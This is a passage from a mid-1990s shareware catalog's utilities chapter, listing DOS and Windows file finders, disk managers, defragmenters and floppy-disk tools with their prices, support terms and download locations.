Finder/Grouper + The best file finder! Find & process files. See full + description on page 37. + + Product: INFOMANIA + Author: Brian Sutton, 813-920-0882 + Version: 2.1 (05-10-95) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; CGA monitor. + Strongly recommended: EGA monitor; Hard disk; Epson printer. + Registration fee: $49.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: 6 months of unlimited phone, CompuServe, + GEnie, mail support; discounts on upgrades. + Look for: INFOMA21.ZIP on BBSs; INFOMA.ZIP on CompuServe in + CIS:IBMPCAPPS forum LIBrary 0 (or contact userID 73160,676 for + assistance); INFOMA21.ZIP on GEnie in IBMPC forum LIBrary 3 (or + contact userID B.SUTTON1 for assistance). + Download size: 210k (about 16 minutes with a 2400 baud modem) + Description: + Find that obscure bit of information you saved somewhere two + years ago! Lets you store all your text files offline on + floppies, yet finds any word or combination in less than a + second. It will prompt you to insert the proper disk, if + + Chapter 2, "Utilities" 14 + + + + needed, then automatically display the file. You can read, + copy, edit, or print any portion(s). Handles many thousands of + files, has context-sensitive hypertext help, mouse support. + Handles files of unlimited size. Gets you organized + painlessly! + + + Product: LJ-SLEEVE + Print floppy storage sleeves on laserjets. See full + description on page 113. + + Product: PixFolio Image Catalog System + Windows image catalog utility. See full description on + page 576. + + Product: QCDRUN + Menu system for accessing CD-ROMs in Windows. See full + description on page 190. + + Product: SmartCat Plus + Author: Shareable Software International, 708-397-1221 + Version: 1.5 (07-23-93) + Needs: IBM PC, Windows 3.0 or better. EGA monitor; Hard disk. + Registration fee: $39.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $9.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + lifetime return policy; bonus utilities; all ASP-wide offers + (see page 6); disks of other shareware; discounts on other + products. + Look for: SMTCAT15.ZIP on BBSs (call 215-623-6203 to download it + at no charge); SMTCAT.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 2 (or contact userID 76226,2652 for assistance). + Download size: 400k (about 30 minutes with a 2400 baud modem) + Description: + A sophisticated new disk/CD management system for Windows. Full + Windows MDI support, virus scanner interface, floppy, hard + disks and CDs, archive support for ZIP, ARC, LZH, PAK and ARJ. + Multiple discrete catalogs, sophisticated searching and + reporting capabilities, label printing. 240 byte comments, full + Windows help. + + Chapter 2, "Utilities" 15 + + + + Product: ViDir/ViRes File Monitor System + Author: Vahnzinn international, 215-643-6901 + Version: 1.02 (02-28-94) + Needs: IBM PC, DOS 3.0 or better. 512k RAM. Memory-resident + portion: 8k-72k RAM depending on options. + Strongly recommended: Hard disk. + Registration fee: $39.00 + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of unlimited phone, CompuServe, + mail support; discounts on upgrades. + Look for: VIDIR*.ZIP on BBSs (call 718-837-3236 to download it at + no charge); VIDIR.ZIP on CompuServe in CIS:IBMSYS forum LIBrary + 6 (or contact userID 70353,151 for assistance). + SWREG#: 2564 + PsL#: 11232 + Download size: 120k (about nine minutes with a 2400 baud modem) + Description: + Determines what files you never use, backs them up, and then + deletes them, helping you save up to 80% of your disk space + without deleting the programs or data files you use. It's like + connecting additional disk drives to your system without the + expense! Also helps you determine: which, of all your files, + are used the most, so you can move them to a RAM disk, and + which word processor or spreadsheet files you need to take with + you on a trip or to print your documents on another PC. + + + Product: Wssindex + Author: WSS Division of DDC, 617-275-1183 + Version: 5.27 (06-05-93) + Needs: IBM PC, DOS 2.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $35.00 (add $2.50 for shipping to U.S. + addresses) (add $2.50 for shipping to Canadian addresses) (add + $4.50 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, BBS, mail support. 3-month return + policy. Lifetime free upgrading allowed. + Look for: WSSI527*.ZIP on BBSs (multiple files) (call + 617-275-5834 to download it at no charge). + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + Builds a database of directory information from any size DOS + disks. Extracts directory information from popular archive + formats including ARC, ARJ, HYP, LBR, LZH, PAK, SDN, ZIP, ZOO + and self-extracting. Image size and number of colors can be + extracted from BMP, GIF, JPG, PCX and TIF files. Assign + comments and categories to files and disks. Extract 4DOS/NDOS + comments. Select files from the database by a variety of + criteria, direct reports to screen, printer or disk. Capacity + 10-12,000 files. + + Chapter 2, "Utilities" 16 + + + + 2.1.2 Hard disk utilities + + Product: Bootit + Multi-boot/user defined HD specs. See full description on + page 119. + + Product: DaMenu + A premier point & shoot DOS menu. See full description on + page 185. + + Product: DATA PROTECTOR + Protect your data against anauthorized access. See full + description on page 209. + + Product: Disk Piecharter + Author: Zorn Software + Version: 1.1 (03-08-95) + Needs: IBM PC, Windows 3.0 or better. 4096k RAM; VGA monitor; + Hard disk; Mouse. + Registration fee: $15.00 + Registration benefits: 3 months of fax, CompuServe, mail support; + all ASP-wide offers (see page 6). + Look for: DSKPIE11.ZIP on BBSs; DSKPIE.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 8 (or contact userID 73134,2177 for + assistance). + SWREG#: 3976 + PsL#: 11746 + Download size: 120k (about nine minutes with a 2400 baud modem) + Description: + Windows Filemanager extension that graphically shows disk usage + per directory and per file. Zoom in and out on piechart + segments. Enables you to delete whole directory trees (if + desired) and shows the effect on free disk space. Seemless + integration with Filemanager. Once installed you'll never want + to be without it. + + + Product: Drag And Zip + Drag and Drop shell for PKZIP/UNZIP. See full description on + page 48. + + Chapter 2, "Utilities" 17 + + + + Product: DRIV_MAN + Author: MicroMetric, 813-377-2515 + Version: 1.30 (10-31-94) + Needs: IBM PC, DOS 3.0 or better. + Strongly recommended: Hard disk. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; all ASP-wide offers (see page 6); disks of other + shareware; discounts on other products. + Look for: DMAN130.ZIP on BBSs (call 813-371-2490 to download it + at no charge); DRIMAN.ZIP on CompuServe in CIS:IBM forum + LIBrary 0 (or contact userID 71631,744 for assistance). + Download size: 82k (about six minutes with a 2400 baud modem) + Description: + A disk utility management tool that displays pertinent logical + drive data - up to 26 drives on a single screen for analysis/ + storage. Display includes: drive data summary with cap. used + free for each avail/selected drive, drive data graph with the + same data, total disk summary and graph, and individual drive + data displaying data on one drive at a time. Options include: + selectable/editable drive range, disk storage of the disk drive + summary display, auto run, ++. + + + Product: EDDY (EDit DirectorY) + Author: ScofWare Associates + Version: 7d (08-30-93) + Needs: IBM PC, DOS 2.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor. + Strongly recommended: Hard disk. + Registration fee: $25.00 + Registration benefits: lifetime CompuServe, mail support. + lifetime return policy. 1 free update disk(s) sent out. + Support, free upgrade. + Look for: EDDY7D.ZIP on BBSs (call 718-837-3236 to download it at + no charge); EDDY7D.ZIP on CompuServe in CIS:IBMSYS forum + LIBrary 6 (or contact userID 70162,2357 for assistance). + Download size: 280k (about 21 minutes with a 2400 baud modem) + Description: + * Full-screen directory editor + * Disk & directory manager + * Backup & recovery utility + * File finder, viewer & patcher + * Hex/text string finder & replacer + * Sector editor, RAM editor + * Powerful DOS shell + ...and MUCH more! + + "Computer Language" says: + "The interface ... is elegant." + + Chapter 2, "Utilities" 18 + + + + "...clean, easy-to-use, well-written program." + "...quality of product we've seen from Peter Norton." + + + Product: Examine + Author: Aquila Software, +44-(0)1892-531108 + Version: 1.12 (08-08-94) + Needs: IBM AT (80286), Windows 3.1 or better. 2000k RAM. + Strongly recommended: Mouse. + Registration fee: L-10.00 (add L-2.00 for shipping to U.S. + addresses) (add L-2.00 for shipping to Canadian addresses) (add + L-2.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, mail support; 2-month return policy; + discounts on other products; discounts on upgrades. 12-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: EXAMN112.ZIP on BBSs. + Download size: 79k (about six minutes with a 2400 baud modem) + Description: + A fast and versatile text search utility that can search both + text and binary files using either ordinary words or GREP-like + regular expressions, the UNIX searching utility, for more + sophisticated searches. Searches can be across multiple drives + over networks or can be restricted to a single directory with + the option of searching subdirectories if so desired. Files can + be viewed either with their associated application or with the + program's own fully configurable internal viewer. + + + Product: ExamineZip + Author: Aquila Software, +44-(0)1892-531108 + Version: 1.01 (08-08-94) + Needs: IBM 80386, Windows 3.1 or better. 2000k RAM. + Strongly recommended: Mouse. + Registration fee: L-10.00 (add L-2.00 for shipping to U.S. + addresses) (add L-2.00 for shipping to Canadian addresses) (add + L-2.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, mail support; 2-month return policy; + discounts on other products; discounts on upgrades. 12-month + free upgrading allowed. 1 free update disk(s) sent out. + Look for: EXZIP101.ZIP on BBSs. + Download size: 127k (about ten minutes with a 2400 baud modem) + Description: + Searches for files and text within files stored in ZIP archives + created with PKZIP (v2.0 or below). File searches can use DOS + wild-cards while text searches can use either ordinary words or + GREP-like regular expressions. Each search can be across + multiple drives over networks or can be restricted to a single + directory. The program can also be used as a fully functional + UNZIP utility where the contents of an archive can be listed, + viewed, tested or extracted to disk. PKUNZIP is not required. + + Chapter 2, "Utilities" 19 + + + + Product: File Finder/Grouper + The best file finder! Find & process files. See full + description on page 37. + + Product: FootPrint + Author: SUPERWARE, 203-723-0014 + Version: 1.4 (11-16-93) + Needs: IBM PC, DOS 3.3 or better. 640k RAM; CGA monitor; + Hercules monitor; Hard disk. + Registration fee: $22.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $7.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, CompuServe, mail + support; all ASP-wide offers (see page 6); disks of other + shareware; discounts on other products. + Look for: FOOTPT14.ZIP on BBSs (call 203-753-2667 to download it + at no charge); FOOTPT.ZIP on CompuServe in CIS:IBMSYS forum + LIBrary 6 (or contact userID 71564,6725 for assistance). + Download size: 82k (about six minutes with a 2400 baud modem) + Description: + Determines the changes which occurred on your hard or networked + drives. Use daily, for application uninstall, or auditing. + Fast; scans over 500 meg in 15 sec! LANs too. Reports all + changes, so you can easily see what happened to a file, what an + install program did, or what software changed on your PC. Saves + you tons of grief! Not a TSR. Just run FP.EXE, use option 'H' + for instructions. "When you need to know 'what happened' help + is just a FootPrint away". + + + Product: Jason's File Finder + Author: RMH Computer Services, 317-782-9903 + Version: 2.0d (09-03-93) + Needs: IBM PC, DOS 3.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive. + Strongly recommended: Hard disk. + Registration fee: $10.00 + Registration benefits: lifetime unlimited phone, BBS, CompuServe, + mail support; 3-month return policy; all ASP-wide offers (see + page 6); disks of other shareware. + Look for: JFF20D.ZIP on BBSs (call 317-784-2147 to download it at + no charge); JFF.ZIP on CompuServe in CIS:IBMSYS forum LIBrary 6 + (or contact userID 73567,1547 for assistance). + SWREG#: 1493 + Download size: 37k (about three minutes with a 2400 baud modem) + Description: + Powerful, fast, and extremely easy-to-use DOS file finder. Will + search for multiple file specs, and accepts standard DOS + wildcard characters. Searches across multiple drives, either + specific or a "range" of drives, and can also search in + specific directories. Accepts any combinations of the above. + Optionally, can perform a DOS command on every file found. Will + also calculate total byte counts for found files. + + Chapter 2, "Utilities" 20 + + + + Product: LOCATE + Author: System Solutions Company, 919-788-9656 + Version: 2.00 (06-01-93) + Needs: IBM PC, DOS 3.1 or better. 125k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; Hard disk. + Strongly recommended: CGA monitor; Network (LAN). + Registration fee: $15.00 (add $4.00 for shipping to U.S. + addresses) (add $8.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, mail support; all ASP- + wide offers (see page 6). Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; LOC200.ZIP on CompuServe + in CIS:NOVUSER forum LIBrary 0 (or contact userID 72064,1052 + for assistance). + Download size: 95k (about seven minutes with a 2400 baud modem) + Description: + Find files/directories fast and easy. Colorful output may be + redirected to printer or file. Search multiple drives, + selected directories, the DOS path, and NetWare Search MAP. + Locate files by date, age (in days), time, attributes, size, + and/or NetWare file owner. Set/Change file date, time, + attributes, and even NetWare file owner. Search for text + within files. Run commands and build batch files. Delete + files. Jump to the directory of LOCATE'ed file. Set defaults + for many options. + + + Product: Mass-Store Copy + Copy disks with only one drive. (Opticals!). See full + description on page 41. + + Product: PALERT + Verify enough disk freespace before using pgm. See full + description on page 128. + + Product: PC-Vault + Security system - access control & protection. See full + description on page 210. + + Product: PC-Vault Plus + Security system - access control & protection. See full + description on page 210. + + Chapter 2, "Utilities" 21 + + + + Product: PCOPY + Author: Patri-Soft, 909-352-2820 + Version: 9.3 (09-01-93) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $24.00 + Registration benefits: 51/4" master disk(s). 3 months of support. + 1-month return policy. + Look for: PCOPY93.ZIP on BBSs (call 909-352-2825 to download it + at no charge); PCOPY.ZIP on CompuServe in CIS:IBMSYS forum + LIBrary 6 (or contact userID 76347,2477 for assistance); + PCOPY93.ZIP on GEnie in IBMPC-615 forum LIBrary 5 (or contact + userID PATRISOFT for assistance). + Download size: 175k (about 13 minutes with a 2400 baud modem) + Awards & nominations: 1987 winner, Public Brand Software + contests for useful programs. + Description: + The COPY utility DOS should have provided. Even with DOS 6.0, + DOS COPY can be dangerous to use and has limited options. + Abundant options include: Multiple output disks, fill disks + efficiently, split files across disks, select files by date/ + time/size, update/merge dirs and more. Special *DISK*.* type + wildcards. Scan/Make directories, prevent accidental file + overlays. Menu or command driven. Featured in PC Computing July + 1991 - Taming your Hard Disk by Preston Gralla. + + + Product: PDEL + Author: Patri-Soft, 909-352-2820 + Version: 4.4 (05-01-92) + Needs: IBM PC, DOS 3.0 or better. + Registration fee: $24.00 + Registration benefits: 51/4" master disk(s); 3 months of BBS + support. 1-month return policy. + Look for: PDEL44.ZIP on BBSs (call 909-352-2825 to download it at + no charge); PDEL.ZIP on CompuServe in CIS:IBMSYS forum LIBrary + 6 (or contact userID 76347,2477 for assistance); PDEL44.ZIP on + GEnie in IBMPC-615 forum LIBrary 5 (or contact userID PATRISOFT + for assistance). + Download size: 62k (about five minutes with a 2400 baud modem) + Awards & nominations: 1987 winner, Public Brand Software + contests for useful programs. + Description: + The file delete utility that DOS should have provided. + Extensive file selection capabilities let you delete just what + you want. Select by date/time, size, attribute, special + wildcard patterns like *DISK*.* and mode. Delete until a + specified amount of freespace exists. Wipe file data before + deleting to prevent file undelete. Test feature simulates + delete. Emergency stop by pressing any key. Recommended in PC + Computing July 1991 - Taming your Hard Disk by Preston Gralla. + + Chapter 2, "Utilities" 22 + + + + Product: PocketD Plus + Award-winning 220+ option DOS army knife. See full description + on page 193. + + Product: Practical Joke Collection [***] + Three harmless practical jokes for DOS. See full description + on page 684. + + Product: PSEARCH + Author: Patri-Soft, 909-352-2820 + Version: 5.2B (07-01-92) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $24.00 + Registration benefits: 51/4" master disk(s); 3 months of BBS + support. 1-month return policy. + Look for: PS52B.ZIP on BBSs (call 909-352-2820 to download it at + no charge); PSRCH.ZIP on CompuServe in CIS:IBMSYS forum LIBrary + 6 (or contact userID 76347,2477 for assistance); PS52B.ZIP on + GEnie in IBMPC-615 forum LIBrary 5 (or contact userID PATRISOFT + for assistance). + Download size: 99k (about eight minutes with a 2400 baud modem) + Awards & nominations: 1987 winner, Public Brand Software + contests for useful programs. + Description: + Used by thousands to locate files on hard disks. You provide + words or phrases, and it will scan directory(s) to find files + containing the text. Extensive file selection and pattern + matching are provided. Provides intelligent display of found + text with scroll back and program launcher. Saves search + results for later review. Recommended in PC World as one of the + Best of Shareware products in 1990 (October 1990). + + + Product: PTOUCH + Author: Patri-Soft, 909-352-2820 + Version: 2.0 (02-03-93) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $14.00 + Registration benefits: 51/4" master disk(s). 3 months of support. + 1-month return policy. + Look for: PTOUCH2.ZIP on BBSs (call 909-352-2825 to download it + at no charge). + Download size: 15k (about one minute with a 2400 baud modem) + Awards & nominations: 1987 winner, Public Brand Software + contests for useful programs. + Description: + Lets you modify the date and time DOS keeps in file directories + for each file. You may either set them to the current date/ + time or to any specific value you desire. Useful for + correcting date/time when the system clock was improperly set. + Can also be used to set a group of files to the same date/time + value. This helps associate them as a synchronized group. + + Chapter 2, "Utilities" 23 + + + + Product: QIC-BAT for CMS + Enhancement software for Colorado tape drives. See full + description on page 42. + + Product: RDIR: Relative DIRectory Size + Author: R.P.McCormick + Version: 1.43 (09-21-93) + Needs: IBM PC, DOS 3.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor. + Strongly recommended: VGA monitor. + Registration fee: $10.00 (add $8.00 for shipping to U.S. + addresses) (add $8.00 for shipping to Canadian addresses) (add + $13.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited BBS, mail support; 1-month limited return + policy; bonus utilities; disks of other shareware. + Look for: RDIR***.ZIP on BBSs (call DELPHI-&-AOL to download it + at no charge); RDIR***.ZIP on GEnie in IBMPC forum LIBrary 5. + Download size: 72k (about six minutes with a 2400 baud modem) + Description: + DOS's DIR does not show the size of subdirectories. This shows + the relative size of subdirectories in an ordered list, a pie + chart, and a bar chart. Pinpoints where disk space is being + used. CGA, EGA, VGA. Navigate around your disk by selecting and + examining directories from the list on the graphics screen + using arrow keys. Or enter drive/directory name from the + command line. RFILE can now be run from RDIR to examine the + relative size of files in the selected directory. Reviewed in + PCM and Compute. + + + Product: Reconcile + Selectively copy files across disks/directory. See full + description on page 57. + + Chapter 2, "Utilities" 24 + + + + Product: RFILE: Relative File Size + Author: R.P.McCormick + Version: 1.16 (09-21-93) + Needs: IBM PC, DOS 3.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor. + Strongly recommended: VGA monitor. + Registration fee: $7.00 (add $8.00 for shipping to U.S. + addresses) (add $8.00 for shipping to Canadian addresses) (add + $13.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited BBS, mail support; 1-month limited return + policy; bonus utilities; disks of other shareware. + Look for: RFILE***.ZIP on BBSs (call DELPHI-&-AOL to download it + at no charge); RFILE***.ZIP on GEnie in IBMPC forum LIBrary 5. + Download size: 78k (about six minutes with a 2400 baud modem) + Description: + Shows selative file size of all files in the selected directory + in a pie chart. Optionally enter a directory name or extension, + such as *.TXT on the command line. Or edit the directory name + as displayed on the graphics screen. An aid to finding where + disk space is being used up. + + + Product: SINCE: List Modified Files + Author: R.P.McCormick + Version: 1.29 (07-24-93) + Needs: IBM PC, DOS 3.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive. + Registration fee: $7.00 (add $8.00 for shipping to U.S. + addresses) (add $8.00 for shipping to Canadian addresses) (add + $13.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited BBS, mail support; 1-month limited return + policy; bonus utilities; disks of other shareware. + Look for: SINCE***.ZIP on BBSs (call DELPHI-&-AOL to download it + at no charge); SINCE***.ZIP on GEnie in IBMPC forum LIBrary 5. + Download size: 30k (about two minutes with a 2400 baud modem) + Description: + Provides a printable list of all files modified since the date + (and optional time) you specify on the command line. Or only + those files with the selected attributes A H S R. Type SINCE at + the top level, followed by the date, and it will list all files + worked on by you or others since that date. Lets you know when + to back up your hard drive. Type "SINCE a" at the top level to + see how many files have been modified since the last backup. + Reviewed in Jan 1993 Compute magazine. + + Chapter 2, "Utilities" 25 + + + + Product: Stowaway True Archival System + Author: Patri-Soft, 909-352-2820 + Version: 2.2 (07-29-93) + Needs: IBM PC, DOS 3.2 or better. Hard disk. + Registration fee: $43.00 + Registration benefits: printed manual; 51/4" master disk(s). 3 + months of support. 1-month return policy. + Look for: STOW191.ZIP on BBSs (call 909-352-2825 to download it + at no charge); STOW.ZIP on CompuServe in CIS:IBMSYS forum + LIBrary 6 (or contact userID 76347,2477 for assistance); + STOW220.ZIP on GEnie in IBMPC-615 forum LIBrary 5 (or contact + userID PATRISOFT for assistance). + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Frees hard disk space by archiving inactive files from hard + disks to a library of offline archive disks. Use its directory + manager to select data to be archived. It works like a backup + program to move the files to diskette while indexing them on + your hard disk. Has data compression, automatic diskette + formatting, viewing of files prior to archival and much more. + Very professionally implemented! + + + Product: ToolBOX + Author: The Binary Toolshed, 403-225-2663 + Version: 1.4 (11-14-93) + Needs: IBM PC, DOS 3.3 or better. 256k RAM. + Registration fee: $30.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, fax, CompuServe support. 1-month + return policy. Lifetime free upgrading allowed. 1 free update + disk(s) sent out. + Look for: TBOX14.ZIP on BBSs; TBOX14.ZI on CompuServe in + CIS:IBMAPP forum LIBrary 5 (or contact userID 70724,2747 for + assistance). + Download size: 345k (about 26 minutes with a 2400 baud modem) + Description: + Provides an improved interface to DOS functions. It allows + access to normal DOS command line functions while adding an + improved alternative - incorporating point-and-shoot + operations, directory tree displays, text file views, and file + management activities not available through DOS. Also supplied + with a number of stand alone utilities for displaying allocated + drives, showing files accessible on the path, directory space + usage, and much more. + + Chapter 2, "Utilities" 26 + + + + Product: USEMGR + Author: XD Systems, 703-821-3215 + Version: 1.0 (03-15-93) + Needs: IBM PC, DOS 3.0 or better. 256k RAM; Hard disk. + Registration fee: $40.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, CompuServe, mail support; + lifetime return policy; discounts on other products. 6-month + free upgrading allowed. + Look for: USEMGR10.ZIP on BBSs; USEMGR.ZIP on CompuServe in + CIS:IBMAPP forum LIBrary 1 (or contact userID 70741,3711 for + assistance). + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + A new and powerful system for managing hard disks. For the + first time, you can automatically determine which files your + system accesses frequently, which it seldom uses, and which are + just unwanted clutter. Regain control of your hard disks, and + sort out the files you really use from among the myriad of + files that modern applications like Windows install on your + hard disk based on a certain knowledge of how many times each + file has been accessed and when the last access occurred. + + + Product: WinUpD8R + Work/home file transfer/update/backup utility. See full + description on page 31. + + Product: XDIR + Author: XD Systems, 703-821-3215 + Version: 3.05 (03-09-91) + Needs: IBM PC, DOS 2.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $25.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, CompuServe, mail support; + lifetime return policy; bonus utilities. 6-month free upgrading + allowed. + Look for: XDIR305.ZIP on BBSs; XDIR30.ZIP on CompuServe in + CIS:IBMSYS forum LIBrary 1 (or contact userID 70741,3711 for + assistance). + Download size: 58k (about five minutes with a 2400 baud modem) + Description: + A commented directory utility that replaces the DOS DIR + command. You can attach a descriptive comment of up to 65 + characters to each file. The comment will appear in the + directory display. Makes sure that comments will stay with + your files when you COPY, RENAME or MOVE them. Can RUN + programs from the directory list and supports executable + extensions, automatically recognizing the appropriate + application to launch for each selected file. + + Chapter 2, "Utilities" 27 + + + + Product: XED + Hex/binary file editor w/ INS+DEL, S&R. See full description + on page 68. + + 2.1.2.1 Optimization & defragmentation + + Product: HDTEST + Author: Computer Counselors, Inc., 215-527-4408 + Version: 5.35a (10-20-91) + Needs: IBM PC, DOS 2.0 or better. 312k RAM. + Registration fee: $35.00 + Registration benefits: Master disks, phone/mail support. + Look for: availability unknown on BBSs; HDTEST.ZIP on CompuServe + in CIS:IBMHW forum LIBrary 1 (or contact userID 72255,305 for + assistance). + Download size: 142k (about eleven minutes with a 2400 baud modem) + Description: + Allows thorough READ/WRITE testing of a hard disk partition or + floppy disk without disturbing data on the disk. Data from a + problem area is moved to a known good area, and the disk's FAT + and directory entries are adjusted to preserve the structure of + the file of which it is a part. Recognizes and tests large + partitions created by MS/PC DOS 4.xx or 5.xx, as well as + proprietary partitions created by SpeedStor or Disk Manager. + + + Product: SpeedBack + Author: MicroTools Inc, 203-651-6170 + Version: 2.3 (02-12-93) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: EGA monitor; Hercules monitor; Hard disk; + Mouse. + Registration fee: $17.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, fax, BBS, CompuServe, + mail support; bonus utilities; disks of other shareware. + Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; SPDBK.ZIP on CompuServe + in CIS:IBMHW forum LIBrary 1 (or contact userID 72077,437 for + assistance). + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + A fast and user friendly disk defragmenter. Using a special + algorithm to minimize movement of data, files are moved to the + front of the disk and placed in contiguous clusters. + Directories are also moved ahead of data files and cleaned up + to remove extra records. Works on all size drives and has an + easy to use mouse/hot key interface. Gets the speed back on + your favorite drive. Defragments disks with up to 24,000 + files! + + Chapter 2, "Utilities" 28 + + + + Product: ViDir/ViRes File Monitor System + Monitor file usage; eliminate unused files. See full + description on page 14. + + 2.1.3 Floppy disk utilities + + Product: Disk Drive Cleaner + Author: Rosenthal Engineering, 805-541-0910 + Version: 1.0 (10-24-93) + Needs: IBM PC, DOS 3.1 or better. 64k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $16.50 (add $3.50 for shipping to U.S. + addresses) (add $4.75 for shipping to Canadian addresses) (add + $5.50 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, fax, mail support; LAN license; site + license; all ASP-wide offers (see page 6). Bonus cleaner kit + (includes solvent & non-abrasive cleaner disk). + Look for: CLEANER1.ZIP on BBSs (multiple files) (call + 805-528-6172 to download it at no charge). + Download size: 33k (about three minutes with a 2400 baud modem) + Description: + Cleans floppy disk drive heads safely & effectively, preventing + data loss, unreliable performance and errors due to microscopic + foreign particles, dirt, dust, oxides and smoke that + accumulates on heads. Preventative maintenance takes only about + four minutes and requires no removal or mechanical disassembly + of the disk drive hardware. + + + Product: DISKCOPY + Author: Feico Nater Shareware, 31-74-438373 + Version: 1.0 (01-01-92) + Needs: IBM PC, DOS 2.0 or better. Hard disk. + Registration fee: $15.00 + Registration benefits: Phone/mail support, free updates. + Look for: DISKCOPY.* on BBSs; DISKCOPY.* on GEnie in 0 forum + LIBrary 0. + Download size: 13k (about one minute with a 2400 baud modem) + Description: + Copies an entire floppy disk onto a file on the fixed disk and + back again. Provides: Easy copying of a floppy disk from A to + A or from B to B, without the need to swap disks several times. + Make many copies of a single disk without the need to use a + source disk. Includes automatic formatting. + + Chapter 2, "Utilities" 29 + + + + Product: DISKLIST + Author: Gulf Sierra, 301-460-0354 + Version: 3.06 (01-25-94) + Needs: IBM PC, DOS 3.1 or better. + Registration fee: $35.00 + Registration benefits: Master disks, phone/mail support. Bonus + utilities. Shareware disks of other programs. + Look for: DISKL306.ZIP on BBSs (call 202-547-2008 to download it + at no charge); DSK306.ZIP on CompuServe in CIS:IBMSYS forum + LIBrary 9 (or contact userID 73270,77 for assistance). + Download size: 180k (about 14 minutes with a 2400 baud modem) + Description: + Produces diskette lists & labels with the directory contents + for 5.25", 3.5", and hard disks in 39 formats. Reads all sub- + dirs. Prints different or duplicate lists on every label on + Avery Laser label sheets. Prints on disk sleeves with PCL5. + Font downloading. Optionally displays file names in ZIP, ARC, + PAK, ZOO, and LHZ. DISKFLAP holds non-sticky list to 3.5" + disks. Configure layout of top of list. Prints on all printers, + video screen or a file. + + + Product: DJ-SLEEVE + Print storage sleeves for floppies on Deskjet. See full + description on page 104. + + Product: Double Directory + File/disk manager; 2 directories side-by-side. See full + description on page 36. + + Product: EDDY (EDit DirectorY) + Do ANYTHING(!) you want with files/DIRs/disks. See full + description on page 17. + + Product: FLOPTOOL + Author: Feico Nater Shareware, 31-74-438373 + Version: 1 (01-01-92) + Needs: IBM PC, DOS 2.0 or better. Hard disk. + Registration fee: $20.00 + Registration benefits: Phone/mail support, free updates. + Look for: FLOPTOOL.* on BBSs; FLOPTOOL.* on GEnie in 0 forum + LIBrary 0. + Download size: 30k (about two minutes with a 2400 baud modem) + Description: + Analyzes a floppy disk and writes onto fixed disk a hexadecimal + file describing the disk. Any disk can be read, even if + formatted in an unusual way. It reveals the order of sectors + and the secrets of copy-protection. + + Chapter 2, "Utilities" 30 + + + + Product: FreeForm + Author: Herne Data Systems Ltd, 519-366-2732 + Version: 2.3 (11-01-94) + Needs: IBM PC, DOS 3.2 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive; CGA + monitor; Dual 720k floppy drives. + Registration fee: $25.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, fax, CompuServe, 